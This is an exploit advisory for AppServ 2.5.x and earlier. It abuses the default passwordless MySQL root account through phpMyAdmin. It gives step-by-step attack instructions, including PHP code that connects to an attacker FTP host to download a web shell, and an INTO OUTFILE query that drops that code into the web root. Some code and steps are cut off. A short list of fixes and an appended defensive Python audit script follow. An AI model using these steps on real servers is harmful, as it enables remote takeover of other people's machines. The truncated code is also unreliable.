
AppServ 2.5.x and Prior Exploit

What is AppServ?
AppServ is an open source installer package for Apache, PHP and MySQL.

Objectives:
- Easy to build a web server and database server.
- For those just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that are easily ported to other platforms such as WindowZ.
- Single-step installation; no need to perform a multi-step, time-consuming installation and configuration.
- Ready to run as soon as you've finished installing.
- If you hate and are bored with the M$ IIS web server.

AppServ URL: http://www.appservnetwork.com

Vulnerable versions: 2.5.x and prior

Problem:

The program ships with a default user (root) with an empty password, which lets an attacker take control of the program and the computer.


Exploit Method

1) Use a scan tool (SuperScan or whatever) to scan for the MySQL service on port 3306.

2) When we find a service (MySQL on 3306), we can request the machine's IP from IE (Internet Explorer), like (http://xxx.xxx.xxx.xxx).

3) If we succeed, the AppServ index page opens.

4) Now we can edit the databases and tables in MySQL through phpMyAdmin from IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin).

5) The default MySQL server comes with two databases (test, mysql); our target is (mysql). Now we can add a new table containing our exploit:

- Create a new table, for example (exploit), with one field of type TEXT.
- Insert the exploit (PHP code) into the database, like:

$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", 


The attacker could use "Windows FTP Server" or any FTP daemon; it doesn't matter :-)
phpshell.php is a script that uses functions like (system, passthru, exec ... etc).
You can find a nice phpshell here (http://phpfm.sf.net).
The attacker could also download an EXE file.

6) Now we are able to write a query result to a file using the INTO OUTFILE statement:
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'

7) Query.php contains our PHP code.

8) If we succeed, we can request

9) If the FTP connection is successful and phpshell.php has been downloaded to the victim's PC, you can send a new request like:

10) Game's Over

Solution:

1) Change the root password.
2) Use a firewall for the Apache and MySQL servers.
3) Use Safe Mode for your scripts.


                       discovered by  Saudi Linux
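
The fixes listed in the advisory can be checked on an install. The following is an added example, not part of the original advisory and not AppServ code: a Python audit over the `[mysqld]` section of `my.ini` and rows read from `mysql.user`. The function name, finding strings and sample data are constructed for illustration, and the `secure_file_priv` check assumes a MySQL version that supports that option.

```python
import configparser

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def audit_mysql(my_ini_text, user_rows):
    """Return findings for the weaknesses the advisory relies on.

    user_rows: dicts holding the mysql.user columns Host, User, Password, File_priv.
    """
    findings = []
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None)
    cp.read_string(my_ini_text)
    # MySQL treats '-' and '_' in option names alike; normalise to '_'.
    opts = {}
    if cp.has_section("mysqld"):
        opts = {k.replace("-", "_"): v for k, v in cp.items("mysqld")}

    for row in user_rows:
        who = "%s@%s" % (row["User"] or "(anonymous)", row["Host"])
        passwordless = not row["Password"]
        if passwordless:
            findings.append("empty password: " + who)
            if row["Host"] not in LOCAL_HOSTS:
                findings.append("passwordless remote login: " + who)
        # FILE is the privilege that permits SELECT ... INTO OUTFILE.
        if row["File_priv"] == "Y" and (passwordless or row["User"] != "root"):
            findings.append("FILE privilege at risk: " + who)

    if "skip_networking" not in opts and opts.get("bind_address") not in LOCAL_HOSTS:
        findings.append("port 3306 listens beyond loopback")
    if not opts.get("secure_file_priv"):
        findings.append("secure_file_priv unset: OUTFILE directory is unrestricted")
    return findings

# Constructed sample data (not dumped from a real AppServ install).
DEFAULT_INI = "[mysqld]\nport=3306\n"
DEFAULT_USERS = [
    {"Host": "localhost", "User": "root", "Password": "", "File_priv": "Y"},
    {"Host": "%", "User": "root", "Password": "", "File_priv": "Y"},
]
HARDENED_INI = ("[mysqld]\nport=3306\nbind-address=127.0.0.1\n"
                "secure-file-priv=C:/mysql-export\n")
HARDENED_USERS = [{"Host": "localhost", "User": "root",
                   "Password": "*CONSTRUCTED-HASH-PLACEHOLDER", "File_priv": "Y"}]

if __name__ == "__main__":
    for finding in audit_mysql(DEFAULT_INI, DEFAULT_USERS):
        print(finding)
```

The rows can be obtained with `SELECT Host, User, Password, File_priv FROM mysql.user`; an empty result list means none of the audited conditions were found.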